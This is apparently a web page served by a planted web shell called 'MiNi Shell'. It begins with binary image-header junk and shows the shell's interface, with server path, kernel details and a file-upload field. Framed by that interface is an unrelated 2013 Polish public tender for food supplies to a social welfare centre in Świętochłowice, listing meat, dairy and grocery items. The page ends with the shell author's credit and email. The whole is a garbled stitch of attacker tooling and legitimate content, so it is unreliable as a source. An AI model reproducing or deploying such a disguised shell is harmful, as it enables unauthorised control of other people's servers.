JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/423470-N-2013.html

<p class="kh_header"><b>Świętochłowice: Dostawa artykułów żywnościowych dla Osrodka Pomocy Społecznej na potrzeby żywienia w placówkach podległych - w podziale na 3 pakiety</b><br>
<b>Numer ogłoszenia: 423470 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops-sw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Osrodka Pomocy Społecznej na potrzeby żywienia w placówkach podległych - w podziale na 3 pakiety.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej  na potrzeby żywienia w placówkach podległych wraz z dostawą i rozładunkiem  w  magazynach Ośrodka Pomocy Społecznej w Świętochłowicach : 
Centrum Aktywizacji Osób Starszych - ul. Imieli 12, ul. Katowicka 35,
Środowiskowy Dom Samopomocy - ul. Karpacka 3, 
2.	Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ - tabela artykułów w zakresie każdego z 3 pakietów. Ilości artykułów podane w tabelach posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3.	Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia lub w innym terminie uzgodnionym z Wykonawcą, w dni powszednie od poniedziałku do piątku w  godzinach od 07:00 do 15:00. 
4.	Wykonawca zobowiązany będzie do bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne oraz rozładunku wraz z wniesieniem do magazynów  określonych w ust. 1
niniejszego paragrafu.  
5.	Wykonawca  zobowiązany będzie dostarczać zamawiany towar w ilości określonej przez Zamawiającego, bezwzględnie w dni powszednie wyznaczone przez Zamawiającego. Za towar w ilości przekraczającej złozone zamówienie, Zamawiający nie będzie ponosił odpłatności.
6.	Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, spełniający normy jakościowe (PN) dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
7.	Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi  przepisami, oraz z warunkami określonymi w SIWZ, musi posiadać początkowy termin przydatności do spożycia.
8.	Wykonawca zabezpieczy należycie towar na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu) i ponosi całkowitą odpowiedzialność za dostawę i jakość dostarczonego towaru.
9.	Zamawiający wymaga, aby faktury za towar miały wyszczególnioną wartość netto i brutto dla każdego asortymentu oddzielnie. 
10.	Wykonawca weźmie na siebie odpowiedzialność za braki i wady powstałe w czasie transportu oraz poniesie z tego tytułu wszelkie skutki prawne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.50.00.00-3, 15.55.00.00-8, 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia
o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia
o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia
o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia
o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia
o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops-sw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świetochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 09:00, miejsce: Świetochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mięsa iprzetworów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron gotowany	kg	  50	
Blok tostowy 	kg	 50	
Boczek wędzony 	kg	160	
Boczek z pieca	kg	150	
Bułczanka  	kg	 100	
Flaczki wołowe blanszowane	kg	 200	
Frankfuterki	kg	 60	
Golonko peklowane-paczkowane 200 g	szt.	400	
Golonko prasowane	kg	150	
Karczek b/k	kg	1000	
Kiełbasa biała 	kg	20	
Kiełbasa domowa 	kg	150	
Kiełbasa kanapkowa	kg	       140	
Kiełbasa kminkowa 	kg	120	
Kiełbasa krotoszyńska	kg	50	
Kiełbasa żywiecka	kg	50	
Kiełbasa metka tradycyjna	kg	35	
Kiełbasa mortadela	kg	100	
Kiełbasa na rożno	kg	360	
Kiełbasa parówkowa	kg	1000	
Kiełbasa podwawelska 	kg	150	
Kiełbasa mielonka	kg	130	
Kiełbasa szynkowa	kg	       150	
Kiełbasa piwoszki	kg	150	
Kiełbasa śląska	kg	1200	
Kości wędzone	kg	60	
Kości świeże	kg	      1800	
Krupniok 	kg	       300	
Łopatka wieprzowa 	kg	1500	
Nóżki wieprzowe	kg	300	
Ozory wieprzowe	kg	350	
Parówki delikatesowe 	kg	1000	
Pasztetowa extra  wędzona	kg	 120	
Pasztetowa biała 	kg	         50	
Płucka czyste	kg	100	
Podgardle wędzone	kg	30	
Polędwica drobiowa	kg	40	
Salami	kg	10	
Salceson ozorkowy	kg	80	
Schab b/k	kg	         60	
Słonina świeża	kg	120	
Słonina wędzona	kg	         70	
Smalec	kg	50	
Szynka gotowana	kg	200	
Szynka gotowana -
paczkowane.200 g	szt.	600	
Szynka wiejska	kg	50	
Wątrobianka	kg	50	
Żeberka pasy	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i przetworów mlecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser ryżowy na mleku, różne smaki, 180 g,
Belriso, Zott lub równoważne	szt	800		
Deser Jogutki   115 g
 lub równoważne	szt.	 800		
Jogurt -różne smaki, owocowa wyspa - 150 g
 Jogobella lub równoważne	szt.	2500		
Jogurt naturalny 190g
Zott, Bakoma, Danone lub równoważne	szt.	 800		
Jogurt  grecki naturalny  400 ml
Bakoma lub równoważne	szt.	 30		
Deser z kaszką manną - 130 g
Smakija lub równoważne	szt.	 600		
Kefir - kubek 250g
Krasnystaw lub równoważne	szt.	 3000		
Filet śledziowy w sosie śmietanowym - 150 g.
Marinus lub równoważne 	szt	600		
Majonez kielecki - 310 ml	szt.	200		
Majonez kielecki - 500 ml	szt.	200		
Margaryna mleczna 250g
Z kruszwicy lub równoważne	szt.	2500		
Margaryna 500 g-
Delma, Smakowita lub równoważne 	szt.	1200		
Masło Extra 82 %- 200g	szt.	10000		
Maślanka karton 1 l
Mrągowska lub równoważne 	szt.	  200		
Mleko 2% folia 0,9 l
Lacpol lub równoważne 	szt.	      13000		
Mleko 2% karton 1 l
Łaciate, Łowickie lub równoważne 	szt.	 300		
Mleko zagęszczone niesłodzone-
500 g
Gostyń lub równoważne 	szt.	20		
Mleko w proszku 0,5kg
Łaciate, Mlekovita lub równoważne 	szt.	  10 		
Pastella- sałatka  - 80 g 
( z makreli, tuńczyka, salami ) 
Lisner, lub równoważne 	szt.	800		
Pastella - sałatka śledziowa -80 g
Lisner lub równoważne	szt.	300		
Sałatka hawajska, norweska 
z szynką -150 g
 Lisner lub równoważne	szt.	600		
Sałatka Salateria 150 g ,różne smaki  z indykiem, kurczakiem,
lub równoważne	szt.	300		
Ser biały półtłusty na sernik łowicki - wiaderka 1 kg
Krasnystaw lub równoważne	szt.	200		
Ser biały półtłusty 
Piątnica, Figard lub równoważne 	kg	750		
Ser domowy z kminkiem	kg	150		
Ser pleśniowy camembert - 120 g
Turek, President lub równoważne 	szt.	300		
Ser Feta sałatkowy  270 g Mlekovita, Piątnica lub równoważne 	szt.	20		
Ser mascarpone 500 g	szt.	30		
Serek Bakuś - różne smaki 150g  Danio lub równoważne
	szt.	          700		
Ser biały 140 g w kubku 
Turek, Mlekpol lub równoważne 	szt.	          600		
Serek topiony w plastrach 150 g
Hochland lub równoważne 	szt.	          500		
Serek topiony 50 g - różne smaki 	szt.	       9500		
Sery żółte - Gouda, Podlaski, Morski  lub równoważne	kg	450		
Ser żółty wędzony - różne 	kg	13		
Sery żółte w plastrach  - 150 g Edamski, Gouda  lub równoważne	szt.	600		
Śmietana 12% - kubek 0,2  l
Krasnystaw, Piątnica lub równoważne 	szt.	900		
Śmietana 36 %- karton 500 g
Łowicka lub równoważne 	szt.	50		
Śmietana 30% - folia 0,25  l	szt.	       1500		
Śmietanki jednorazowe 
 10 g x10 szt. w paczce
Zott lub równoważne 	szt.	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.55.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pozostałe artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas w puszce 565g
Kier, MK lub równoważne	szt.	340		
Aromat do ciast 10 ml	szt.	12		
Baton czekoladowy 50 g 
Pawełek, Danusia, Maciek, Ikar lub równoważne	szt.	1200		
Bigos w słoiku - 500 g	szt.	12		
Budyń 40g różne smaki 
Winiary, Gellwe lub równoważne	szt.	     1200		
Bombonierki 150 g 
Ptasie mleczko, Kocie jezyczki
Wedel, Goplana lub równoważne 	szt.	        50		
Brzoskwinie w puszce 850 g w syropie 
Kier, lub równoważne	szt.	370		
Cukier waniliowy 16 g	szt.	0		
Cukier 1 kg- biały kryształ 	kg	      2450		
Cukier puder 500 g 
Diamont lub równoważne 	kg	         5		
Chrupki 250g	szt.	 20		
Chipsy 250 g	szt.	 20		
Chrzan tarty 160g	szt.	300		
Ciastka delicje 147 g paczkowane 	szt.	250		
Ciastka biszkopty luzem	kg	         5		
Ciastka czekoladowe - różne 	kg	         10		
Ciastka kruche- różne 	kg	         90		
Cukierki landryny 100 g paczkowane	szt.	20		
Cukierki zwykłe	kg	         20		
Cukierki czekoladowe	kg	         40		
Cynamon 20 g	szt. 	 15		
Czekolada nadziewana 100 g - różne smaki 	szt. 	500		
Czekolada mleczna, gorzka 100 g	szt. 	1000		
Czekolada w proszku 1 kg
Milka lub równoważne 	szt. 	 2		
Czekolada dla cukrzyków 100 g	szt. 	 20		
Dżem 260 g - różne smaki 	szt. 	 700		
Dżemiki jednorazowe 25g	szt.	 50		
Drożdże 100 g 	szt.	 15		
Fasola biała w opak. 5 lub 10 kg	kg	        180		
Fasolka po bretońsku  w słoiku 
- 700 g	szt	40		
Fasola kolorowa  w opak. 5 lub 10 kg	kg	        140		
Galaretka 75g różne smaki	szt.	750		
Gałka muszkatałowa 100 g	szt.	 50		
Groch łuskany w opakow. 5 lub 10 kg	kg	  220		
Herbata granulowana 80 g indyjska	op.	      1300		
Herbata ziołowa 10 sasz. po 1,2 g
Mieta, melisa, 	op.	20		
Herbata ekspresowa w torebkach - 100 szt
Saga, Minutka lub równoważne 	op.	 150		
Herbatniki paczkowane 148 g
Krakuski, Łakotki lub równoważne 	szt.	 500		
Jabłko suszone 	kg	  10		
Kawa zbożowa 500 g	szt.	 100		
Kawa naturalna 100 g
Prima, Gala lub równoważne 	szt.	 700		
Kawa naturalna 250 g
MK Premium lub równoważne 	szt.	 150		
Kawa rozpuszczalna 100 g
Nescafe lub równoważne 	szt.	 170		
Kasza gryczana (4 x 100) 	op. 	20		
Kasza gryczana prażona 	kg.	  100		
Kasza jęczmienna średnia 	kg.	  420		
Kasza manna 
z Młyna w Stoisławiu lub równoważne 	kg.	  320		
Ketchup łagodny 500g	szt.	 120		
Kakao 100 g 
Wawel, Decomoreno lub równoważne 	szt.	 80		
Kisiel 75g  różne smaki  Winiary, Gellwe, lub równoważne	szt.	  20		
Kleik ryżowy180 g Bobovita 
lub równoważne 	szt.	  20		
Kokos wiórki 	kg	  4		
Kremy różne do tortów 120g	szt.	 30		
Kukurydza   w puszce 200 g
Rolnik lub równoważne 	szt.	160		
Klopsy wieprzowe w sosie pomidorowym  w słoiku - 500 g	szt	12		
Kminek mielony 	kg	  6		
Kolendra 20 g	szt	50		
Krem czekoladowy 350 g
Nutella lub równoważne 	szt	120		
Kostka rosołowa 6 x 36 g
Winiary lub równoważne	szt	60		
Kluski na parze 300 g 
Buchty 	szt	20		
Konserwy turystyczne 130 g 	szt	2000		
Konserwy rybne 170 g, 
w pomidorach lu oleju 	szt	600		
Liść laurowy luzem 	kg.	  2		
Mak luzem 	kg.	  40		
Makaron - cienkie nitki	kg.	 170		
Makaron gruby - kolanka, muszelki	kg.	 550		
Mąka  pszenna typ 450 - 
opakowanie  1 kg	kg	1100		
Mąka razowa z otrębami 	kg	130		
Mąka ziemniaczana opak  1 kg	kg	150		
Majeranek luzem 	kg	8		
Miód sztuczny 370g	szt.	6		
Miodziki jednorazowe 25g	szt.	 50		
Miód prawdziwy 400g	szt.	 5		
Migdały 100 g
Kresto lub równoważne 	szt.	   300		
Morele suszone	kg	 5		
Musztarda łagodna 180 g	szt.	   230		
Musztarda ostra  180 g	szt.	   200		
Olej uniwersalny 3 l 	szt.	   140		
Oliwki zielone 900 g	szt.	   3		
Orzechy włoskie łuskane 	kg	  2		
Orzechy laskowe w czekoladzie 80 g 
Jutrzenka lub równoważne 	szt.	   300		
Ocet spirytusowy 1 l	szt.	   220		
Ogórki konserwowe 1 l	szt.	   50		
Pasztet drobiowy w puszcze
 160 g	szt.	  2200		
Papryka w proszku luzem 	kg	4		
Pieprz czarny mielony luzem 	kg	6		
Pieprz ziołowy luzem 	kg	5		
Pierniki lukrowane luzem 	kg	50		
Pierniki w czekoladzie luzem 	kg	60		
Paluszki solone 80 g	szt.	  50		
Proszek do pieczenia 16g 	szt.	  30		
Przecier pomidorowy 30% 1780 g	szt.	400		
Przecier ogórkowy 300 ml
Rolnik lub równoważne 	szt.	10		
Przyprawa korzenna 25g 
Prymat lub równoważne	szt.	 10		
Przyprawa do drobiu 	kg	4		
Przyprawa1000g Kucharek, Warzywko lub równoważne	szt.	750		
Przyprawa Magii w płynie 1 l	szt.	150		
Płatki owsiane górskie 500 g	kg	140		
Cukierki 150 g 
Rafaello lub równoważne 	szt.	50		
Rodzynki w czekoladzie 100 g	szt.	300		
Ryż 4x 100 g 	szt.	20		
Ryż w opak. 1 kg	kg	450		
Rodzynki luzem 	kg	10		
Sałatka z tuńczyka, makreli 80 g 	szt.	500		
Syrop malinowy 500 ml
Cymes lub równoważne 	szt.	250		
Śmietana w proszku 55 g
Śnieżka lub równoważne 	szt.	50		
Śmietanka 80g 
Cremona lub równoważne	szt.	120		
Śmietana Fix w proszku 	szt.	30		
Soczki małe 0,2 l  w kartonikach -różne smaki	szt.	120		
Sok owocowy w kartonach 1 l
Tymbark, Hortex lub równoważne 	szt.	50		
Sos do spaghetti - w proszku 	szt.	 20		
Soda oczyszczona 15 g	szt.	 12		
Sok cytrynowy 1 l	szt.	400		
Sucharki 450 g	szt.	 50		
Sól spożywcza 1 kg	kg	720		
Śliwka suszona luzem 	kg	10		
Wafelki  ok. 50g -  Princessa, 
Prince polo, góralki Grzeski  lub równoważne	szt.	     1300		
Wafle ryżowe naturalne cienkie 160 g	szt.	        30		
Woda niegazowana 1,5 l	szt.	        250		
Woda gazowana 1,5 l	szt.	        150		
Woda niegazowana 05 l.	szt.	        250		
Woda gazowana 0,5 l	szt.	        100		
Żelatyna wieprzowa 50 g	szt.	         40		
Ziele angielskie luzem	kg	          6		
Zupa w proszku grochowa , pomidorowa - luzem 	kg	         10		
Zupa w proszku grochowa , pomidorowa - 36 g	szt	         30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com